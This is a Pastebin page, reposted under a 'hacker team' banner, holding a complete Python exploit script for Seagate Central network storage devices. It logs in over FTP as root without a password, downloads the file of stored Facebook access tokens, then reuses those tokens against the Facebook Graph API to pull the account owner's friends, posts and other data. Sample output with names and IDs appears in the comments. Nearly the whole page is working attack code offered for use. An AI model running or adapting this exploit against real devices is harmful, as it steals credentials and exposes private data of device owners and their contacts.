API tools faq
paste
Advertisement
hackerpham

Seagate Central Remote Facebook Access Token

hackerpham
Jul 10th, 2015
305
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.21 KB | None | 0 0
raw download clone embed print report
  1. ==========================================================================================================================================================================================INTERNATIONAL HACKER TEAM===================================================
  2. ==========================================================HACKING & SECURITY=======================================================
  3. ===================================================================================================================================
  4.  
  5. Member Offical: Hacker Phạm , Tuấn Băng ,Phuồi Bình , Lê Quang Dũng , Bảo Nguyễn ,Nguyễn Anh Kiệt ,Minh Tuấn Phạm,...
  6.  
  7. 1. Use in python
  8.  
  9. 2.Tag: exploit / root
  10.  
  11. 3. About code :
  12.  
  13. Seagate Central stores linked Facebook account access tokens in /etc/archive_accounts.ser and this exploit takes advantage of two bugs - Passwordless root login via FTP to retrieve archive_accounts.ser file which contains access tokens and reuses the unencrypted and unprotected (-rw-r--r--) access tokens for a chosen scope to return data.
  14.  
  15. 4. Code:
  16.  
  17. #!/usr/bin/python
  18. # seagate_central_facebook.py
  19. #
  20. # Seagate Central Remote Facebook Access Token Exploit
  21. #
  22. # Jeremy Brown [jbrown3264/gmail]
  23. # May 2015
  24. #
  25. # -Synopsis-
  26. #
  27. # Seagate Central stores linked Facebook account access tokens in /etc/archive_accounts.ser
  28. # and this exploit takes advantage of two bugs:
  29. #
  30. # 1) Passwordless root login via FTP to retrieve archive_accounts.ser file which contains access tokens
  31. # 2) Reuses the unencrypted and unprotected (-rw-r--r--) access tokens for a chosen scope to return data
  32. #
  33. # -Example-
  34. #
  35. # > seagate_fb_accounts.py getaccesstoken 1.2.3.4
  36. #
  37. # 'archive_accounts.ser'
  38. #
  39. # a:1:{s:8:"facebook";a:1:{s:29:"user3535@facebook.com";a:5:{s:7:"service";s:8:"facebook";s:4:
  40. # "user";s:29:"user3535@facebook.com";s:5:"owner";s:4:"test";s:6:"folder";s:7:"private";s:5:"t
  41. # oken";s:186:"CAAxxxxxxxx..."
  42. # ;}}}
  43. #
  44. # Next, try this:
  45. #
  46. # > seagate_fb_accounts.py CAAxxxxxxxx... friends
  47. # server response:
  48. #
  49. # {'data': [{'name': 'Jessie Taylor', 'id': '100000937485968'}, {'name': 'Kellie Youty', 'id': '1
  50. # 00000359801427'}, {'name': 'Hope Maynard', 'id': '10000102938470'}, {'name': 'Angel Tucker Pole', 'id'
  51. # : '100001402808867'}, {'name': 'Malcolm Vance', 'id': '10000284629187'}, {'name': 'Tucker Civile', 'id':
  52. # .....
  53. #
  54. # Scopes Reference: https://developers.facebook.com/docs/graph-api/reference/v2.1/user
  55. #
  56. # -Fixes-
  57. #
  58. # Seagate scheduled updates to go live on April 28th, 2015.
  59. #
  60. # Tested version: 2014.0410.0026-F
  61. #
  62.  
  63. import sys
  64. import json
  65. from urllib import request # python3
  66. from ftplib import FTP
  67.  
  68. fb_url = "https://graph.facebook.com"
  69. fb_filename = "archive_accounts.ser"
  70.  
  71. def getaccesstoken(host):
  72.     try:
  73.         ftp = FTP(host)
  74.         ftp.login("root")
  75.         ftp.retrbinary("RETR " + "/etc/" + fb_filename, open(fb_filename, 'wb').write)
  76.         ftp.close()
  77.    
  78.     except Exception as error:
  79.         print("Error: %s" % error)
  80.         return
  81.  
  82.     try:
  83.         with open(fb_filename, 'r') as file:
  84.             data = file.read()
  85.  
  86.     except Exception as error:
  87.         print("Error: %s" % error)
  88.         return
  89.  
  90.     print("\n'%s'\n\n%s\n\n" % (fb_filename, data))
  91.  
  92.     return
  93.  
  94. def main():
  95.     if(len(sys.argv) < 2):
  96.         print("Usage: %s <key> <scope> OR getaccesstoken <host>\n" % sys.argv[0])
  97.         print("scopes: albums feed friends likes picture posts television")
  98.         return
  99.  
  100.     if(sys.argv[1] == "getaccesstoken"):
  101.         if(len(sys.argv) == 3):
  102.             host = sys.argv[2]
  103.  
  104.             res = getaccesstoken(host)
  105.        
  106.         else:
  107.             print("Error: need host to retrieve access token file\n")
  108.             return
  109.  
  110.     else:
  111.         key = sys.argv[1]
  112.    
  113.         if(len(sys.argv) == 3):
  114.             scope = sys.argv[2]
  115.         else:
  116.             scope = ""
  117.  
  118.         try:
  119.             response = request.urlopen(fb_url + "/me/" + scope + "?access_token=" + key).read()
  120.  
  121.         except Exception as error:
  122.             print("Error: %s" % error)
  123.             return
  124.  
  125.         data = json.loads(response.decode('utf-8'))
  126.  
  127.         print("server response:\n\n%s\n" % data)
  128.  
  129.     return
  130.  
  131. if __name__ == "__main__":
  132.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!